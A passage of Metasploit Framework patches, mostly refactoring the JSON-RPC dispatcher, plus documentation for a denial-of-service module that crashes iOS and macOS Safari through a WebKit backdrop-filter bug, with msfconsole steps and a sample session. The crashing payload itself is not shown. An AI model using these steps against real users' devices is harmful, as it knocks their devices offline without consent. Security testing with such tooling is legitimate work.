dispatchers[version_sym] = create_dispatcher(version_sym, framework) end @@ -14,11 +12,7 @@ module Msf::RPC::JSON end def create_dispatcher(version, framework) - $stderr.puts("Msf::RPC::JSON::DispatcherHelper.create_dispatcher(): version=#{version}, framework=#{framework}") - $stderr.puts("Msf::RPC::JSON::DispatcherHelper.create_dispatcher(): creating RpcCommand...") command = RpcCommandFactory.create(version, framework) - $stderr.puts("Msf::RPC::JSON::DispatcherHelper.create_dispatcher(): command=#{command}") - $stderr.puts("Msf::RPC::JSON::DispatcherHelper.create_dispatcher(): creating Dispatcher...") dispatcher = Dispatcher.new(framework) dispatcher.set_command(command) diff --git a/lib/msf/core/rpc/json/rpc_command.rb b/lib/msf/core/rpc/json/rpc_command.rb index 10df34c4c7..d053fac5db 100644 --- a/lib/msf/core/rpc/json/rpc_command.rb +++ b/lib/msf/core/rpc/json/rpc_command.rb @@ -7,18 +7,12 @@ module Msf::RPC::JSON @framework = framework @execute_timeout = execute_timeout @methods = {} - - $stderr.puts("Msf::RPC::JSON::RpcCommand.initialize(): @framework=#{@framework}, @framework.object_id=#{@framework.object_id}") - $stderr.puts("Msf::RPC::JSON::RpcCommand.initialize(): @execute_timeout=#{@execute_timeout}") - $stderr.puts("Msf::RPC::JSON::RpcCommand.initialize(): @methods=#{@methods}") end # Add a method to the RPC Command def register_method(method, name: nil) - $stderr.puts("Msf::RPC::JSON::RpcCommand.register_method(): method.class=#{method.class}, method.inspect=#{method.inspect}, name=#{name}") if name.nil? if method.is_a?(Method) - $stderr.puts("Msf::RPC::JSON::RpcCommand.register_method(): method.name=#{method.name}") name = method.name.to_s else name = method.to_s @@ -29,16 +23,10 @@ module Msf::RPC::JSON # Call method on the receiver object previously registered. def execute(method, params) - $stderr.puts("Msf::RPC::JSON::RpcCommand.execute(): method=#{method}, params=#{params}") - $stderr.puts("Msf::RPC::JSON::RpcCommand.execute(): @methods.key?(method)=#{@methods.key?(method)}") - $stderr.puts("Msf::RPC::JSON::RpcCommand.execute(): @methods[method]=#{@methods[method]}") if @methods.key?(method) - unless @methods.key?(method) - $stderr.puts("Msf::RPC::JSON::RpcCommand.execute(): raising MethodNotFound...") raise MethodNotFound.new(method) end - $stderr.puts("Msf::RPC::JSON::RpcCommand.execute(): calling method_name=#{method}...") ::Timeout.timeout(@execute_timeout) do params = prepare_params(params) if params.nil? @@ -68,7 +56,6 @@ module Msf::RPC::JSON clean_params = stringify_names(params) end - $stderr.puts("Msf::RPC::JSON::RpcCommand.prepare_params(): params=#{params}, clean_params=#{clean_params}") clean_params end diff --git a/lib/msf/core/rpc/json/rpc_command_factory.rb b/lib/msf/core/rpc/json/rpc_command_factory.rb index 6ac2c0b4e2..22a2c6328f 100644 --- a/lib/msf/core/rpc/json/rpc_command_factory.rb +++ b/lib/msf/core/rpc/json/rpc_command_factory.rb @@ -5,7 +5,6 @@ require 'msf/core/rpc/json/v2_0/rpc_test' module Msf::RPC::JSON class RpcCommandFactory def self.create(version, framework) - $stderr.puts("Msf::RPC::JSON::RpcCommandFactory.create: version=#{version}, framework=#{framework}") # TODO: remove case version when :v1, :v1_0, :v10 return Msf::RPC::JSON::V1_0::RpcCommand.new(framework) @@ -20,7 +19,6 @@ module Msf::RPC::JSON # TODO: does belong in some sort of loader class for an RPC version? # instantiate receiver rpc_test = Msf::RPC::JSON::V2_0::RpcTest.new() - $stderr.puts("Msf::RPC::JSON::RpcCommandFactory.create_rpc_command_v2_0: rpc_test=#{rpc_test}") command = Msf::RPC::JSON::RpcCommand.new(framework) diff --git a/lib/msf/core/rpc/json/v1_0/rpc_command.rb b/lib/msf/core/rpc/json/v1_0/rpc_command.rb index dd37929665..5313973920 100644 --- a/lib/msf/core/rpc/json/v1_0/rpc_command.rb +++ b/lib/msf/core/rpc/json/v1_0/rpc_command.rb @@ -19,9 +19,6 @@ module Msf::RPC::JSON @legacy_rpc_service = ::Msf::RPC::Service.new(@framework, { execute_timeout: @execute_timeout }) - - $stderr.puts("Msf::RPC::JSON::V1_0::RpcCommand.initialize(): @framework=#{@framework}, @framework.object_id=#{@framework.object_id}") - $stderr.puts("Msf::RPC::JSON::V1_0::RpcCommand.initialize(): @legacy_rpc_service=#{@legacy_rpc_service}, @legacy_rpc_service.handlers=#{@legacy_rpc_service.handlers}") end def register_method(method, name: nil) @@ -42,25 +39,14 @@ module Msf::RPC::JSON # Call method on the receiver object previously registered. def execute_internal(method, params) - $stderr.puts("Msf::RPC::JSON::V1_0::RpcCommand.execute(): method=#{method}, params=#{params}") - # parse method string group, base_method = parse_method_group(method) - $stderr.puts("Msf::RPC::JSON::V1_0::RpcCommand.execute(): group=#{group}, base_method=#{base_method}") # TODO: remove method_name = "rpc_#{base_method}" method_name_noauth = "rpc_#{base_method}_noauth" - $stderr.puts("Msf::RPC::JSON::V1_0::RpcCommand.execute(): method_name=#{base_method}, method_name_noauth=#{method_name_noauth}, @legacy_rpc_service.handlers[group]=#{@legacy_rpc_service.handlers[group]}") - $stderr.puts("Msf::RPC::JSON::V1_0::RpcCommand.execute(): @legacy_rpc_service.handlers[group].nil?=#{@legacy_rpc_service.handlers[group].nil?}") - $stderr.puts("Msf::RPC::JSON::V1_0::RpcCommand.execute(): @legacy_rpc_service.handlers[group].respond_to?(method_name)=#{@legacy_rpc_service.handlers[group].respond_to?(method_name)}") - $stderr.puts("Msf::RPC::JSON::V1_0::RpcCommand.execute(): @legacy_rpc_service.handlers[group].respond_to?(method_name_noauth)=#{@legacy_rpc_service.handlers[group].respond_to?(method_name_noauth)}") - - handler = (find_handler(@legacy_rpc_service.handlers, group, method_name) || find_handler(@legacy_rpc_service.handlers, group, method_name_noauth)) - $stderr.puts("Msf::RPC::JSON::V1_0::RpcCommand.execute(): handler=#{handler}") if handler.nil? - $stderr.puts("Msf::RPC::JSON::V1_0::RpcCommand.execute(): raising MethodNotFound...") raise MethodNotFound.new(method) end @@ -68,8 +54,6 @@ module Msf::RPC::JSON method_name = method_name_noauth end - - $stderr.puts("Msf::RPC::JSON::V1_0::RpcCommand.execute(): calling method_name=#{method_name}...") ::Timeout.timeout(@execute_timeout) do params = prepare_params(params) if params.nil? @@ -107,7 +91,6 @@ module Msf::RPC::JSON if method == MODULE_EXECUTE_KEY && params.size >= 2 && params[0] == PAYLOAD_MODULE_TYPE_KEY && result.key?(PAYLOAD_KEY) result[PAYLOAD_KEY] = Base64.strict_encode64(result[PAYLOAD_KEY]) - $stderr.puts("Msf::RPC::JSON::V1_0::RpcCommand.post_process_result(): converted result key '#{PAYLOAD_KEY}': new value=#{result[PAYLOAD_KEY]}") end result diff --git a/lib/msf/core/rpc/json/v2_0/rpc_test.rb b/lib/msf/core/rpc/json/v2_0/rpc_test.rb index 615262b793..a81544b4bd 100644 --- a/lib/msf/core/rpc/json/v2_0/rpc_test.rb +++ b/lib/msf/core/rpc/json/v2_0/rpc_test.rb @@ -4,25 +4,18 @@ module Msf::RPC::JSON::V2_0 def initialize r = Random.new @rand_num = r.rand(0..100) - $stderr.puts("Msf::RPC::JSON::V2_0::RpcTest.initialize(): @rand_num=#{@rand_num}") end def self.add(x, y) - result = x + y - $stderr.puts("Msf::RPC::JSON::V2_0::RpcTest.add(): x=#{x}, y=#{y}, result=#{result}") - - result + x + y end def get_instance_rand_num - $stderr.puts("Msf::RPC::JSON::V2_0::RpcTest instance.get_instance_rand_num(): @rand_num=#{@rand_num}") - @rand_num end def add_instance_rand_num(x) @rand_num = @rand_num + x - $stderr.puts("Msf::RPC::JSON::V2_0::RpcTest instance.add_instance_rand_num(): x=#{x}, @rand_num=#{@rand_num}") @rand_num end diff --git a/lib/msf/core/web_services/servlet/json_rpc_servlet.rb b/lib/msf/core/web_services/servlet/json_rpc_servlet.rb index dcbce72157..1299ef037a 100644 --- a/lib/msf/core/web_services/servlet/json_rpc_servlet.rb +++ b/lib/msf/core/web_services/servlet/json_rpc_servlet.rb @@ -19,10 +19,7 @@ module JsonRpcServlet warden.authenticate! begin body = request.body.read - $stderr.puts("JsonRpcServlet: body=#{body}") tmp_params = sanitize_params(params) - $stderr.puts("JsonRpcServlet: tmp_params=#{tmp_params}") - data = get_dispatcher(settings.dispatchers, tmp_params[:version], settings.framework).process(body) set_raw_response(data) rescue => e From 9d3d9c3ad6c27c7fada83b149d5fe99891d9e7c8 Mon Sep 17 00:00:00 2001 From: Matthew Kienow Date: Thu, 20 Sep 2018 19:58:04 -0400 Subject: [PATCH 038/192] Change parameter version to Symbol --- lib/msf/core/rpc/json/dispatcher_helper.rb | 7 +++---- lib/msf/core/web_services/servlet/json_rpc_servlet.rb | 2 +- 2 files changed, 4 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/rpc/json/dispatcher_helper.rb b/lib/msf/core/rpc/json/dispatcher_helper.rb index a4e08f563a..a255b07a31 100644 --- a/lib/msf/core/rpc/json/dispatcher_helper.rb +++ b/lib/msf/core/rpc/json/dispatcher_helper.rb @@ -3,12 +3,11 @@ require 'msf/core/rpc' module Msf::RPC::JSON module DispatcherHelper def get_dispatcher(dispatchers, version, framework) - version_sym = version.to_sym - unless dispatchers.key?(version_sym) - dispatchers[version_sym] = create_dispatcher(version_sym, framework) + unless dispatchers.key?(version) + dispatchers[version] = create_dispatcher(version, framework) end - dispatchers[version_sym] + dispatchers[version] end def create_dispatcher(version, framework) diff --git a/lib/msf/core/web_services/servlet/json_rpc_servlet.rb b/lib/msf/core/web_services/servlet/json_rpc_servlet.rb index 1299ef037a..29fc554e94 100644 --- a/lib/msf/core/web_services/servlet/json_rpc_servlet.rb +++ b/lib/msf/core/web_services/servlet/json_rpc_servlet.rb @@ -20,7 +20,7 @@ module JsonRpcServlet begin body = request.body.read tmp_params = sanitize_params(params) - data = get_dispatcher(settings.dispatchers, tmp_params[:version], settings.framework).process(body) + data = get_dispatcher(settings.dispatchers, tmp_params[:version].to_sym, settings.framework).process(body) set_raw_response(data) rescue => e print_error("There was an error executing the RPC: #{e.message}.", e) From c7badd5c37a54d78a1fc1ad1a348d4e29be21f62 Mon Sep 17 00:00:00 2001 From: Matthew Kienow Date: Thu, 20 Sep 2018 20:07:45 -0400 Subject: [PATCH 039/192] Add method comments --- lib/msf/core/rpc/json/dispatcher.rb | 35 ++++++++++++++++++- lib/msf/core/rpc/json/dispatcher_helper.rb | 10 ++++++ lib/msf/core/rpc/json/rpc_command.rb | 22 ++++++++++-- lib/msf/core/rpc/json/rpc_command_factory.rb | 8 +++++ lib/msf/core/rpc/json/v1_0/rpc_command.rb | 34 +++++++++++++++--- lib/msf/core/rpc/json/v2_0/rpc_test.rb | 1 + .../web_services/servlet/json_rpc_servlet.rb | 1 + 7 files changed, 102 insertions(+), 9 deletions(-) diff --git a/lib/msf/core/rpc/json/dispatcher.rb b/lib/msf/core/rpc/json/dispatcher.rb index a1b5a83b53..d690a7744c 100644 --- a/lib/msf/core/rpc/json/dispatcher.rb +++ b/lib/msf/core/rpc/json/dispatcher.rb @@ -8,15 +8,23 @@ module Msf::RPC::JSON attr_reader :framework attr_reader :command + # Instantiate a Dispatcher. + # @param framework [Msf::Simple::Framework] Framework wrapper instance def initialize(framework) @framework = framework @command = nil end + # Set the command. + # @param command [RpcCommand] the command used by the Dispatcher. def set_command(command) @command = command end + # Process the JSON-RPC request. + # @param source [String] the JSON-RPC request + # @return [String] JSON-RPC response that encapsulates the RPC result + # if successful; otherwise, a JSON-RPC error response. def process(source) begin request = parse_json_request(source) @@ -52,6 +60,14 @@ module Msf::RPC::JSON self.class.to_json(response) end + # Validate and execute the JSON-RPC request. + # @param request [Hash] the JSON-RPC request + # @returns [RpcCommand] an RpcCommand for the specified version + # @raise [InvalidParams] ArgumentError occurred during execution. + # @raise [ApplicationServerError] General server-error wrapper around an + # Msf::RPC::Exception that occurred during execution. + # @returns [Hash] JSON-RPC response that encapsulates the RPC result + # if successful; otherwise, a JSON-RPC error response. def process_request(request) begin if !validate_rpc_request(request) @@ -81,6 +97,9 @@ module Msf::RPC::JSON end end + # Validate the JSON-RPC request. + # @param request [Hash] the JSON-RPC request + # @returns [Boolean] true if the JSON-RPC request is a valid; otherwise, false. def validate_rpc_request(request) required_members = %i(jsonrpc method) member_types = { @@ -122,7 +141,10 @@ module Msf::RPC::JSON end # Parse the JSON document source into a Hash or Array with symbols for the names (keys). - # @return [Hash or Array] source + # @param source [String] the JSON source + # @raise [ParseError] Invalid JSON was received by the server. + # An error occurred on the server while parsing the JSON text. + # @return [Hash or Array] Hash or Array representation of source def parse_json_request(source) begin JSON.parse(source, symbolize_names: true) @@ -132,6 +154,7 @@ module Msf::RPC::JSON end # Serialize data as JSON string. + # @param data [Hash] data # @return [String] data serialized JSON string if data not nil; otherwise, nil. def self.to_json(data) return nil if data.nil? @@ -140,6 +163,10 @@ module Msf::RPC::JSON return json.to_s end + # Create a JSON-RPC success response. + # @param result [Object] the RPC method's return value + # @param request [Hash] the JSON-RPC request + # @returns [Hash] JSON-RPC success response. def self.create_success_response(result, request = nil) response = { # A String specifying the version of the JSON-RPC protocol. @@ -156,6 +183,10 @@ module Msf::RPC::JSON response end + # Create a JSON-RPC error response. + # @param error [RpcError] a RpcError instance + # @param request [Hash] the JSON-RPC request + # @returns [Hash] JSON-RPC error response. def self.create_error_response(error, request = nil) response = { # A String specifying the version of the JSON-RPC protocol. @@ -173,6 +204,8 @@ module Msf::RPC::JSON end # Adds response id based on request id. + # @param response [Hash] the JSON-RPC response + # @param request [Hash] the JSON-RPC request def self.add_response_id_member(response, request) if !request.nil? && request.key?(:id) response[:id] = request[:id] diff --git a/lib/msf/core/rpc/json/dispatcher_helper.rb b/lib/msf/core/rpc/json/dispatcher_helper.rb index a255b07a31..17d103f765 100644 --- a/lib/msf/core/rpc/json/dispatcher_helper.rb +++ b/lib/msf/core/rpc/json/dispatcher_helper.rb @@ -2,6 +2,12 @@ require 'msf/core/rpc' module Msf::RPC::JSON module DispatcherHelper + # Get an RPC Dispatcher for the RPC version. Creates a new instance and stores + # it in the dispatchers hash if one does not already exist for the version. + # @param dispatchers [Hash] hash of version Symbol - Msf::RPC::JSON::Dispatcher object pairs + # @param version [Symbol] the RPC version + # @param framework [Msf::Simple::Framework] Framework wrapper instance + # @returns [Msf::RPC::JSON::Dispatcher] an RPC Dispatcher for the specified version def get_dispatcher(dispatchers, version, framework) unless dispatchers.key?(version) dispatchers[version] = create_dispatcher(version, framework) @@ -10,6 +16,10 @@ module Msf::RPC::JSON dispatchers[version] end + # Create an RPC Dispatcher composed of an RpcCommand for the provided version. + # @param version [Symbol] the RPC version + # @param framework [Msf::Simple::Framework] Framework wrapper instance + # @returns [Msf::RPC::JSON::Dispatcher] an RPC Dispatcher for the specified version def create_dispatcher(version, framework) command = RpcCommandFactory.create(version, framework) dispatcher = Dispatcher.new(framework) diff --git a/lib/msf/core/rpc/json/rpc_command.rb b/lib/msf/core/rpc/json/rpc_command.rb index d053fac5db..0086dd5bbe 100644 --- a/lib/msf/core/rpc/json/rpc_command.rb +++ b/lib/msf/core/rpc/json/rpc_command.rb @@ -3,6 +3,9 @@ module Msf::RPC::JSON attr_reader :framework attr_accessor :execute_timeout + # Instantiate an RpcCommand. + # @param framework [Msf::Simple::Framework] Framework wrapper instance + # @param execute_timeout [Integer] execute timeout duration in seconds def initialize(framework, execute_timeout: 7200) @framework = framework @execute_timeout = execute_timeout @@ -10,6 +13,9 @@ module Msf::RPC::JSON end # Add a method to the RPC Command + # @param method [Method] the Method + # @param name [String] the name the method is register under. The method name is used if nil. + # @returns [Method] the Method. def register_method(method, name: nil) if name.nil? if method.is_a?(Method) @@ -21,7 +27,12 @@ module Msf::RPC::JSON @methods[name] = method end - # Call method on the receiver object previously registered. + # Invokes the method on the receiver object with the specified params, + # returning the method's return value. + # @param method [String] the RPC method name + # @param params [Array, Hash] parameters for the RPC call + # @raise [MethodNotFound] The method does not exist + # @returns [Object] the method's return value. def execute(method, params) unless @methods.key?(method) raise MethodNotFound.new(method) @@ -41,7 +52,10 @@ module Msf::RPC::JSON private - # Prepare params for use by RPC methods by converting all hashes to use strings for their names (keys). + # Prepare params for use by RPC methods by converting all hashes + # to use strings for their names (keys). + # @param params [Array, Hash] parameters for the RPC call + # @returns [Array, Hash] modified parameters def prepare_params(params) clean_params = params if params.is_a?(Array) @@ -59,7 +73,9 @@ module Msf::RPC::JSON clean_params end - # Returns a new hash with strings for the names (keys). + # Stringify the names (keys) in hash. + # @param hash [Hash] input hash + # @returns [Hash] a new hash with strings for the keys. def stringify_names(hash) JSON.parse(JSON.dump(hash), symbolize_names: false) end diff --git a/lib/msf/core/rpc/json/rpc_command_factory.rb b/lib/msf/core/rpc/json/rpc_command_factory.rb index 22a2c6328f..e67739da40 100644 --- a/lib/msf/core/rpc/json/rpc_command_factory.rb +++ b/lib/msf/core/rpc/json/rpc_command_factory.rb @@ -4,6 +4,11 @@ require 'msf/core/rpc/json/v2_0/rpc_test' module Msf::RPC::JSON class RpcCommandFactory + # Create an RpcCommand for the provided version. + # @param version [Symbol] the RPC version + # @param framework [Msf::Simple::Framework] Framework wrapper instance + # @raise [ArgumentError] invalid RPC version + # @returns [RpcCommand] an RpcCommand for the specified version def self.create(version, framework) case version when :v1, :v1_0, :v10 @@ -15,6 +20,9 @@ module Msf::RPC::JSON end end + # Creates an RpcCommand for a demonstration RPC version 2.0. + # @param framework [Msf::Simple::Framework] Framework wrapper instance + # @returns [RpcCommand] an RpcCommand for a demonstration RPC version 2.0 def self.create_rpc_command_v2_0(framework) # TODO: does belong in some sort of loader class for an RPC version? # instantiate receiver diff --git a/lib/msf/core/rpc/json/v1_0/rpc_command.rb b/lib/msf/core/rpc/json/v1_0/rpc_command.rb index 5313973920..93f7ea5ba1 100644 --- a/lib/msf/core/rpc/json/v1_0/rpc_command.rb +++ b/lib/msf/core/rpc/json/v1_0/rpc_command.rb @@ -10,6 +10,9 @@ module Msf::RPC::JSON PAYLOAD_MODULE_TYPE_KEY = 'payload' PAYLOAD_KEY = 'payload' + # Instantiate an RpcCommand. + # @param framework [Msf::Simple::Framework] Framework wrapper instance + # @param execute_timeout [Integer] execute timeout duration in seconds def initialize(framework, execute_timeout: 7200) super(framework, execute_timeout: execute_timeout) @@ -21,15 +24,18 @@ module Msf::RPC::JSON }) end + # @raise [RuntimeError] The method is not implemented def register_method(method, name: nil) raise "#{self.class.name}##{__method__} is not implemented" end - # Call method on the receiver object previously registered. + # Invokes the method on the receiver object with the specified params, + # returning the method's return value. + # @param method [String] the RPC method name + # @param params [Array, Hash] parameters for the RPC call + # @returns [Object] the method's return value. def execute(method, params) result = execute_internal(method, params) - - # post process result result = post_process_result(result, method, params) result @@ -37,9 +43,13 @@ module Msf::RPC::JSON private - # Call method on the receiver object previously registered. + # Internal method that invokes the method on the receiver object with + # the specified params, returning the method's return value. + # @param method [String] the RPC method name + # @param params [Array, Hash] parameters for the RPC call + # @raise [MethodNotFound] The method does not exist + # @returns [Object] the method's return value. def execute_internal(method, params) - # parse method string group, base_method = parse_method_group(method) method_name = "rpc_#{base_method}" @@ -66,6 +76,9 @@ module Msf::RPC::JSON end end + # Parse method string in the format "group.base_method_name". + # @param method [String] the RPC method name + # @returns [Array] Tuple of strings, group and base_method def parse_method_group(method) idx = method.rindex(METHOD_GROUP_SEPARATOR) if idx.nil? @@ -78,6 +91,11 @@ module Msf::RPC::JSON return group, base_method end + # Find the concrete Msf::RPC::RPC_Base handler for the group and method name. + # @param handlers [Hash] hash of group String - Msf::RPC::RPC_Base object pairs + # @param group [String] the RPC group + # @param method_name [String] the RPC method name + # @returns [Msf::RPC::RPC_Base] concrete Msf::RPC::RPC_Base instance if one exists; otherwise, nil. def find_handler(handlers, group, method_name) handler = nil if !handlers[group].nil? && handlers[group].respond_to?(method_name) @@ -87,7 +105,13 @@ module Msf::RPC::JSON handler end + # Perform custom post processing of the execute result data. + # @param result [Object] the method's return value + # @param method [String] the RPC method name + # @param params [Array, Hash] parameters for the RPC call + # @returns [Object] processed method's return value def post_process_result(result, method, params) + # post-process payload module result for JSON output if method == MODULE_EXECUTE_KEY && params.size >= 2 && params[0] == PAYLOAD_MODULE_TYPE_KEY && result.key?(PAYLOAD_KEY) result[PAYLOAD_KEY] = Base64.strict_encode64(result[PAYLOAD_KEY]) diff --git a/lib/msf/core/rpc/json/v2_0/rpc_test.rb b/lib/msf/core/rpc/json/v2_0/rpc_test.rb index a81544b4bd..7a959a7a0c 100644 --- a/lib/msf/core/rpc/json/v2_0/rpc_test.rb +++ b/lib/msf/core/rpc/json/v2_0/rpc_test.rb @@ -1,4 +1,5 @@ module Msf::RPC::JSON::V2_0 + # Receiver class for demonstration RPC version 2.0. class RpcTest def initialize diff --git a/lib/msf/core/web_services/servlet/json_rpc_servlet.rb b/lib/msf/core/web_services/servlet/json_rpc_servlet.rb index 29fc554e94..d9d7482f32 100644 --- a/lib/msf/core/web_services/servlet/json_rpc_servlet.rb +++ b/lib/msf/core/web_services/servlet/json_rpc_servlet.rb @@ -14,6 +14,7 @@ module JsonRpcServlet private ####### + # Process JSON-RPC request def self.post_rpc lambda { warden.authenticate! From 7d30f781f62aeefe5ccc27da86c3b257c7c4b02c Mon Sep 17 00:00:00 2001 From: Matthew Kienow Date: Thu, 20 Sep 2018 20:09:42 -0400 Subject: [PATCH 040/192] Add missing raise --- lib/msf/core/rpc/json/dispatcher.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/rpc/json/dispatcher.rb b/lib/msf/core/rpc/json/dispatcher.rb index d690a7744c..002bbd4d8c 100644 --- a/lib/msf/core/rpc/json/dispatcher.rb +++ b/lib/msf/core/rpc/json/dispatcher.rb @@ -93,7 +93,7 @@ module Msf::RPC::JSON rescue ArgumentError raise InvalidParams.new rescue Msf::RPC::Exception => e - ApplicationServerError.new(e.message, data: { code: e.code }) + raise ApplicationServerError.new(e.message, data: { code: e.code }) end end From 5280cf0c5026b2124f6f42385e2f33ed1db9b00f Mon Sep 17 00:00:00 2001 From: Matthew Kienow Date: Fri, 21 Sep 2018 11:19:38 -0400 Subject: [PATCH 041/192] Move required members and types to constants --- lib/msf/core/rpc/json/dispatcher.rb | 49 ++++++++++++++--------------- 1 file changed, 24 insertions(+), 25 deletions(-) diff --git a/lib/msf/core/rpc/json/dispatcher.rb b/lib/msf/core/rpc/json/dispatcher.rb index 002bbd4d8c..bf2bbe26c0 100644 --- a/lib/msf/core/rpc/json/dispatcher.rb +++ b/lib/msf/core/rpc/json/dispatcher.rb @@ -4,6 +4,27 @@ require 'msf/core/rpc' module Msf::RPC::JSON class Dispatcher JSON_RPC_VERSION = '2.0' + JSON_RPC_REQUIRED_MEMBERS = %i(jsonrpc method) + JSON_RPC_MEMBER_TYPES = { + # A String specifying the version of the JSON-RPC protocol. + jsonrpc: [String], + # A String containing the name of the method to be invoked. + method: [String], + # If present, parameters for the rpc call MUST be provided as a Structured + # value. Either by-position through an Array or by-name through an Object. + # * by-position: params MUST be an Array, containing the values in the + # Server expected order. + # * by-name: params MUST be an Object, with member names that match the + # Server expected parameter names. The absence of expected names MAY + # result in an error being generated. The names MUST match exactly, + # including case, to the method's expected parameters. + params: [Array, Hash], + # An identifier established by the Client that MUST contain a String, + # Number, or NULL value if included. If it is not included it is assumed + # to be a notification. The value SHOULD normally not be Null [1] and + # Numbers SHOULD NOT contain fractional parts [2] + id: [Integer, String, NilClass] + } attr_reader :framework attr_reader :command @@ -101,40 +122,18 @@ module Msf::RPC::JSON # @param request [Hash] the JSON-RPC request # @returns [Boolean] true if the JSON-RPC request is a valid; otherwise, false. def validate_rpc_request(request) - required_members = %i(jsonrpc method) - member_types = { - # A String specifying the version of the JSON-RPC protocol. - jsonrpc: [String], - # A String containing the name of the method to be invoked. - method: [String], - # If present, parameters for the rpc call MUST be provided as a Structured - # value. Either by-position through an Array or by-name through an Object. - # * by-position: params MUST be an Array, containing the values in the - # Server expected order. - # * by-name: params MUST be an Object, with member names that match the - # Server expected parameter names. The absence of expected names MAY - # result in an error being generated. The names MUST match exactly, - # including case, to the method's expected parameters. - params: [Array, Hash], - # An identifier established by the Client that MUST contain a String, - # Number, or NULL value if included. If it is not included it is assumed - # to be a notification. The value SHOULD normally not be Null [1] and - # Numbers SHOULD NOT contain fractional parts [2] - id: [Integer, String, NilClass] - } - # validate request is an object return false unless request.is_a?(Hash) # validate request contains required members - required_members.each { |member| return false unless request.key?(member) } + JSON_RPC_REQUIRED_MEMBERS.each { |member| return false unless request.key?(member) } return false if request[:jsonrpc] != JSON_RPC_VERSION # validate request members are correct types request.each do |member, value| - return false if member_types.key?(member) && - !member_types[member].one? { |type| value.is_a?(type) } + return false if JSON_RPC_MEMBER_TYPES.key?(member) && + !JSON_RPC_MEMBER_TYPES[member].one? { |type| value.is_a?(type) } end true From f404b7e699e80b9423cf44ec4ee36404a007e888 Mon Sep 17 00:00:00 2001 From: Green-m Date: Sun, 23 Sep 2018 11:29:05 +0800 Subject: [PATCH 042/192] Improve the context to be more percise. --- spec/lib/msf/ui/console/command_dispatcher/core_spec.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/spec/lib/msf/ui/console/command_dispatcher/core_spec.rb b/spec/lib/msf/ui/console/command_dispatcher/core_spec.rb index aa861b97fd..9ab56a0c38 100644 --- a/spec/lib/msf/ui/console/command_dispatcher/core_spec.rb +++ b/spec/lib/msf/ui/console/command_dispatcher/core_spec.rb @@ -114,7 +114,7 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Core do all_options.each do |option| describe "with #{option} arguments" do - it "should return a instance of array" do + it "should return array or nil" do set_tabs_test(option) end end @@ -130,7 +130,7 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Core do all_options.each do |option| describe "with #{option} arguments" do - it "should return a instance of array" do + it "should return array or nil" do set_tabs_test(option) end end @@ -146,7 +146,7 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Core do all_options.each do |option| describe "with #{option} arguments" do - it "should return a instance of array" do + it "should return array or nil" do set_tabs_test(option) end end From 738665e56f13e28283817a70ba594aea81670552 Mon Sep 17 00:00:00 2001 From: Tim W Date: Mon, 24 Sep 2018 17:10:13 +0800 Subject: [PATCH 043/192] Add documentation for #10652 --- .../apple_ios/webkit_backdrop_filter_blur.md | 31 +++++++++++++++++++ .../apple_ios/webkit_backdrop_filter_blur.rb | 7 ++--- 2 files changed, 33 insertions(+), 5 deletions(-) create mode 100644 documentation/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.md diff --git a/documentation/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.md b/documentation/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.md new file mode 100644 index 0000000000..5ae2f91a9d --- /dev/null +++ b/documentation/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.md @@ -0,0 +1,31 @@ +## Vulnerable Application + +This module exploits a vulnerability in Safari WebKit to crash the device. +The bug affects all iOS devices running iOS 9 up to iOS 12 and Safari on OSX 10.13.6 + +The device will "re-spring" the operating system, but not actually restart the device. + +## Verification Steps + +1. Start msfconsole +1. Do: `use auxiliary/dos/apple_ios/webkit_backdrop_filter_blur` +1. Do: `set URIPATH /` (Optional) +1. Do: `run` +1. When you visit the device on a vulnerable device, it should crash the operating system + +## Scenarios + +### Safari 602.1 on iOS 10.1.1 + +``` +msf5 > use auxiliary/dos/apple_ios/webkit_backdrop_filter_blur +msf5 auxiliary(dos/apple_ios/webkit_backdrop_filter_blur) > set URIPATH / +URIPATH => / +msf5 auxiliary(dos/apple_ios/webkit_backdrop_filter_blur) > run + +[*] Using URL: http://0.0.0.0:8080/ +[*] Local IP: http://192.168.0.1:8080/ +[*] Server started. +[*] 192.168.0.2: Sending response to User-Agent: Mozilla/5.0 (iPod touch; CPU iPhone OS 10_1_1 like Mac OS X) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0 Mobile/14B150 Safari/602.1 + +``` diff --git a/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.rb b/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.rb index 18dd5119c5..0ea751d84e 100644 --- a/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.rb +++ b/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.rb @@ -25,9 +25,6 @@ class MetasploitModule < Msf::Auxiliary ['URL', 'https://nbulischeck.github.io/apple-safari-crash'], ], 'DisclosureDate' => "Sep 15 2018", - 'Actions' => [[ 'WebServer' ]], - 'PassiveActions' => [ 'WebServer' ], - 'DefaultAction' => 'WebServer' ) ) end @@ -36,8 +33,8 @@ class MetasploitModule < Msf::Auxiliary exploit end - def on_request_uri(cli, _request) - print_status('Sending response') + def on_request_uri(cli, request) + print_status("#{cli.peerhost}: Sending response to User-Agent: #{request['User-Agent']}") html = %| From 888ec9430c49056066fecc6864df783724f417ef Mon Sep 17 00:00:00 2001 From: Tim W Date: Mon, 24 Sep 2018 17:37:59 +0800 Subject: [PATCH 044/192] fix typo --- .../auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.md b/documentation/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.md index 5ae2f91a9d..5dfbac0edc 100644 --- a/documentation/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.md +++ b/documentation/modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.md @@ -11,7 +11,7 @@ The device will "re-spring" the operating system, but not actually restart the d 1. Do: `use auxiliary/dos/apple_ios/webkit_backdrop_filter_blur` 1. Do: `set URIPATH /` (Optional) 1. Do: `run` -1. When you visit the device on 